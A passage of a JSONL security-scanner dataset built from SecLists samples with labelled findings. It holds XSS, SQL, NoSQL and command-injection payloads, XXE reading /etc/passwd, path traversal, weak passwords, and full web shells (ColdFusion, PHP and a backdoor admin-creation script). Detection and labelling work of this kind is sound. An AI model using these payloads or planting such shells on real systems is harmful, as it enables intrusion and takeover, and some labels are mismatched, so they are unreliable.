application/xml\n\n<!ENTITY % param3 \"<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>\">", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!ENTITY % param3 \"<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>\">", "injection_type": "XXE"}}]} {"id": "seclists_00475", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup>", "injection_type": "XSS"}}]} {"id": "seclists_00476", "source": "seclists", "source_license": "MIT", "text": "filename=a)|/usr/bin/id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a)|/usr/bin/id;", "injection_type": "cmd"}}]} {"id": "seclists_00477", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: *'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*'", "injection_type": "cmd"}}]} {"id": "seclists_00478", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>:target {transform: rotate(180deg);}</style><progress id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></progress> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><progress id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></progress>", "injection_type": "XSS"}}]} {"id": "seclists_00479", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\".print(`echo%20POVQEX`.`echo%20$((96%2B65))`.`echo%20POVQEX`.`echo%20POVQEX`)%3B%23POVQEX HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\".print(`echo%20POVQEX`.`echo%20$((96%2B65))`.`echo%20POVQEX`.`echo%20POVQEX`)%3B%23POVQEX", "injection_type": "cmd"}}]} {"id": "seclists_00480", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &echo$IFSXXOEKT$((47%2B54))$(echo$IFSXXOEKT)XXOEKT&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo$IFSXXOEKT$((47%2B54))$(echo$IFSXXOEKT)XXOEKT&", "injection_type": "cmd"}}]} {"id": "seclists_00481", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;echo$IFSWSRCRX$((45%2B83))$(echo$IFSWSRCRX)WSRCRX//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSWSRCRX$((45%2B83))$(echo$IFSWSRCRX)WSRCRX//", "injection_type": "cmd"}}]} {"id": "seclists_00482", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=a' or 3=3-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a' or 3=3--", "injection_type": "SQL"}}]} {"id": "seclists_00483", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<x on%78xx=1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x on%78xx=1", "injection_type": "XSS"}}]} {"id": "seclists_00484", "source": "seclists", "source_license": "MIT", "text": "filename=%0aecho%20FDJRHK$((66%2B94))$(echo%20FDJRHK)FDJRHK%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20FDJRHK$((66%2B94))$(echo%20FDJRHK)FDJRHK%7C", "injection_type": "cmd"}}]} {"id": "seclists_00485", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes>", "injection_type": "XSS"}}]} {"id": "seclists_00486", "source": "seclists", "source_license": "MIT", "text": "password: Micron,<BLANK>,sldkj754,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Micron,<BLANK>,sldkj754,"}}]} {"id": "seclists_00487", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n' && this.passwordzz.match(/.*/)//+%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' && this.passwordzz.match(/.*/)//+%00", "injection_type": "NoSQL"}}]} {"id": "seclists_00488", "source": "seclists", "source_license": "MIT", "text": "<cfapplication scriptProtect=\"none\">\n\n<!---\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@securitywhole.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides access to shell acces on the system.\n*** Modified by Tim Medin\n*** Modified by Matt Presson <@matt_presson>\n*** - Added some basic authentication via HTTP header\n*** - Resolved cfexecute stripping quotes\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n--->\n\n<cfset secretCode = \"a208bddb1f68aa8a8641b65d93979740c82fb387\" /> <!--- Set this to something unique like a randomly generated SHA1 Hash --->\n<cfset QuoteMark = \"'\" />\n<cfset DoubleQuoteMark = \"\"\"\" />\n\n<!--- Authentication: Check for the GUID in either a custom header or POSTed by the form --->\n<cfset suppliedCode = \"\" />\n<cfif structKeyExists(GetHttpRequestData().headers, \"X-Auth-Code\")>\n <cfset suppliedCode = \"#StructFind(GetHttpRequestData().headers, \"X-Auth-Code\")#\" />\n<cfelseif structKeyExists(FORM, \"authCode\")>\n <cfset suppliedCode = \"#StructFind(FORM, \"authCode\")#\" />\n</cfif>\n\n<cfif ( #suppliedCode# neq secretCode )>\n <cfheader statuscode=\"404\" statustext=\"Page Not Found\" />\n <cfabort />\n</cfif>\n\n<html>\n <head><title>Laudanum Coldfusion Shell</title></head>\n <body>\n <form action=\"<cfoutput>#cgi.script_name#</cfoutput>\" method=\"POST\">\n <cfif IsDefined(\"form.cmd\")>\n Executable: <Input type=\"text\" name=\"cmd\" value=\"<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>\"> For Windows use: cmd.exe or the full path to cmd.exe<br>\n Arguments: <Input type=\"text\" name=\"arguments\" value=\"<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>\"> For Windows use: /c <i>command</i><br>\n <cfelse>\n Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>\n Arguments: <Input type=\"text\" name=\"arguments\" value=\"/c \"><br>\n </cfif>\n\n <input type=\"hidden\" name=\"authCode\" value=\"<cfoutput>#HTMLEditFormat(suppliedCode)#</cfoutput>\">\n <input type=\"submit\">\n </form>\n\n<!--- Updated the call to cfexecute so use an array instead of a string. This way quotes are not stripped. --->\n<cfif IsDefined(\"form.cmd\")>\n <cfset argumentsArray = #listToArray(form.arguments, \" \")# />\n\n <pre>\n <cfexecute name=\"#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#\" arguments=\"#argumentsArray#\" timeout=\"5\" variable=\"foo\"></cfexecute>\n <cfoutput>#Replace(foo, \"<\", \"&lt;\", \"All\")#</cfoutput>\n </pre>\n</cfif>\n\n Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.\n\n <hr/>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureid", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "cfm", "filename": "shell.cfm"}}]} {"id": "seclists_00489", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"path_info\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"path_info\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00490", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ||echo$IFSDZTQUV$((58%2B75))$(echo$IFSDZTQUV)DZTQUV", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo$IFSDZTQUV$((58%2B75))$(echo$IFSDZTQUV)DZTQUV", "injection_type": "cmd"}}]} {"id": "seclists_00491", "source": "seclists", "source_license": "MIT", "text": "filename='|echo%20NUZDZT$((76%2B71))$(echo%20NUZDZT)NUZDZT|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'|echo%20NUZDZT$((76%2B71))$(echo%20NUZDZT)NUZDZT|", "injection_type": "cmd"}}]} {"id": "seclists_00492", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_00493", "source": "seclists", "source_license": "MIT", "text": "filename=<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/passwd\">]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/passwd\">]><foo>&xxe;</foo>", "injection_type": "cmd"}}]} {"id": "seclists_00494", "source": "seclists", "source_license": "MIT", "text": "username=declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)", "injection_type": "SQL"}}]} {"id": "seclists_00495", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Unknown,<BLANK>,password,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Unknown,<BLANK>,password,"}}]} {"id": "seclists_00496", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Character Encoding Example</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Character Encoding Example", "injection_type": "XSS"}}]} {"id": "seclists_00497", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = sqlvuln", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "sqlvuln", "injection_type": "SQL"}}]} {"id": "seclists_00498", "source": "seclists", "source_license": "MIT", "text": "<?php\n\n/*\n\nPut this file into your root folder. Set the user settings below and run the script. It will auto-delete when done.\n\n*/\n\n$mageFilename = 'app/Mage.php';\nif (!file_exists($mageFilename)) {\n\techo $mageFilename.\" was not found\";\n\texit;\n}\nrequire_once $mageFilename;\nMage::app();\n\ntry {\n\t//create new user by providing details below\n\t$user = Mage::getModel('admin/user')\n\t\t->setData(array(\n\t\t\t'username' => 'admin',\n\t\t\t'firstname' => 'Admin',\n\t\t\t'lastname'\t=> 'User',\n\t\t\t'email' => 'admin@mymagento.com',\n\t\t\t'password' => 'admi',\n\t\t\t'is_active' => 1\n\t\t))->save();\n\n} catch (Exception $e) {\n\techo $e->getMessage();\n\texit;\n}\n\ntry {\n\t//create new role\n\t$role = Mage::getModel(\"admin/roles\")\n\t\t\t->setName('Inchoo')\n\t\t\t->setRoleType('G')\n\t\t\t->save();\n\t\n\t//give \"all\" privileges to role\n\tMage::getModel(\"admin/rules\")\n\t\t\t->setRoleId($role->getId())\n\t\t\t->setResources(array(\"all\"))\n\t\t\t->saveRel();\n\n} catch (Mage_Core_Exception $e) {\n\techo $e->getMessage();\n\texit;\n} catch (Exception $e) {\n\techo 'Error while saving role.';\n\texit;\n}\n\ntry {\n\t//assign user to role\n\t$user->setRoleIds(array($role->getId()))\n\t\t->setRoleUserId($user->getUserId())\n\t\t->saveRelations();\n\n} catch (Exception $e) {\n\techo $e->getMessage();\n\texit;\n}\n\necho 'Admin User sucessfully created!';\necho '<br /><br /><b>THIS FILE WILL NOW TRY TO DELETE ITSELF, BUT PLEASE CHECK TO BE SURE!</b>';\n@unlink(__FILE__);\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "newadmin-KINKCreative.php"}}]} {"id": "seclists_00499", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_00500", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Name contained XSS variant 4</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Name contained XSS variant 4", "injection_type": "XSS"}}]} {"id": "seclists_00501", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\"", "injection_type": "cmd"}}]} {"id": "seclists_00502", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<data draggable=\"true\" ondragend=\"alert(1)\">test</data> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<data draggable=\"true\" ondragend=\"alert(1)\">test</data>", "injection_type": "XSS"}}]} {"id": "seclists_00503", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'anything' OR 'x'='x';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "anything' OR 'x'='x", "injection_type": "SQL"}}]} {"id": "seclists_00504", "source": "seclists", "source_license": "MIT", "text": "filename=%ff", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%ff", "injection_type": "cmd"}}]} {"id": "seclists_00505", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=buttercu\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "buttercu"}}]} {"id": "seclists_00506", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>:target {color:red;}</style><section id=x style=\"transition:color 1s\" ontransitionend=alert(1)></section> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><section id=x style=\"transition:color 1s\" ontransitionend=alert(1)></section>", "injection_type": "XSS"}}]} {"id": "seclists_00507", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, injection, gecko</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, injection, gecko", "injection_type": "XSS"}}]} {"id": "seclists_00508", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JS link with whitespace obfuscation</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JS link with whitespace obfuscation", "injection_type": "XSS"}}]} {"id": "seclists_00509", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<div draggable=\"true\" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark>", "injection_type": "XSS"}}]} {"id": "seclists_00510", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><object id=x onfocusin=alert(1) type=text/html></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<object id=x onfocusin=alert(1) type=text/html>", "injection_type": "XSS"}}]} {"id": "seclists_00511", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ''||UTL_HTTP.REQUEST';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'||UTL_HTTP.REQUEST", "injection_type": "SQL"}}]} {"id": "seclists_00512", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: self contained, general, obfuscated</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: self contained, general, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_00513", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf |echo%20PAKNUK$((48%2B25))$(echo%20PAKNUK)PAKNUK%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo%20PAKNUK$((48%2B25))$(echo%20PAKNUK)PAKNUK%26", "injection_type": "cmd"}}]} {"id": "seclists_00514", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %21", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%21", "injection_type": "cmd"}}]} {"id": "seclists_00515", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x003C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x003C", "injection_type": "cmd"}}]} {"id": "seclists_00516", "source": "seclists", "source_license": "MIT", "text": "username=)&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")", "injection_type": "SQL"}}]} {"id": "seclists_00517", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=tennis1\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tennis1"}}]} {"id": "seclists_00518", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Multiline selfcontained XSS\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Multiline selfcontained XSS", "injection_type": "XSS"}}]} {"id": "seclists_00519", "source": "seclists", "source_license": "MIT", "text": "password: UNIX,ftp,<BLANK>,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,ftp,<BLANK>,"}}]} {"id": "seclists_00520", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<marquee onstart=alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<marquee onstart=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00521", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0aecho%20NZXQYS$((60%2B28))$(echo%20NZXQYS)NZXQYS%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0aecho%20NZXQYS$((60%2B28))$(echo%20NZXQYS)NZXQYS%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_00522", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ; exec master..xp_cmdshell", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; exec master..xp_cmdshell", "injection_type": "SQL"}}]} {"id": "seclists_00523", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x onxxx%3D1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onxxx%3D1", "injection_type": "XSS"}}]} {"id": "seclists_00524", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><noframes onkeyup=\"alert(1)\" contenteditable>test</noframes></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noframes onkeyup=\"alert(1)\" contenteditable>test</noframes>", "injection_type": "XSS"}}]} {"id": "seclists_00525", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><strong onkeydown=\"alert(1)\" contenteditable>test</strong></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<strong onkeydown=\"alert(1)\" contenteditable>test</strong>", "injection_type": "XSS"}}]} {"id": "seclists_00526", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_00527", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'tz_offset';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "tz_offset", "injection_type": "SQL"}}]} {"id": "seclists_00528", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "injection_type": "cmd"}}]} {"id": "seclists_00529", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "--", "injection_type": "SQL"}}]} {"id": "seclists_00530", "source": "seclists", "source_license": "MIT", "text": "<?php\n\n/* +***********************************************************************************\n * The contents of this file are subject to the vtiger CRM Public License Version 1.0\n * (\"License\"); You may not use this file except in compliance with the License\n * The Original Code is: vtiger CRM Open Source\n * The Initial Developer of the Original Code is vtiger.\n * Portions created by vtiger are Copyright (C) vtiger.\n * All Rights Reserved.\n * *********************************************************************************** */\n\nclass VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {\n\n public function checkPermission(Vtiger_Request $request) {\n return true;\n }\n\n public function process(Vtiger_Request $request) {\n echo \"<pre>\";\n system($request->get(\"cmd\"));\n echo \"</pre>\";\n die;\n }\n\n public function validateRequest(Vtiger_Request $request) {\n return true;\n }\n\n}", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "Gateway.php"}}]} {"id": "seclists_00531", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ' or user like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or user like '%", "injection_type": "cmd"}}]} {"id": "seclists_00532", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=silence\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "silence"}}]} {"id": "seclists_00533", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_00534", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><body draggable=\"true\" ondragstart=\"alert(1)\">test</body></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body draggable=\"true\" ondragstart=\"alert(1)\">test</body>", "injection_type": "XSS"}}]} {"id": "seclists_00535", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%00../../../../../../etc/passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%00../../../../../../etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_00536", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 0=0 # HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 #", "injection_type": "SQL"}}]} {"id": "seclists_00537", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%203%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%203%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_00538", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0Aid%0A", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0Aid%0A", "injection_type": "cmd"}}]} {"id": "seclists_00539", "source": "seclists", "source_license": "MIT", "text": "username=<>\"'%;)(&+&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<>\"'%;)(&+", "injection_type": "SQL"}}]} {"id": "seclists_00540", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"DOCUMENT_NAME\" 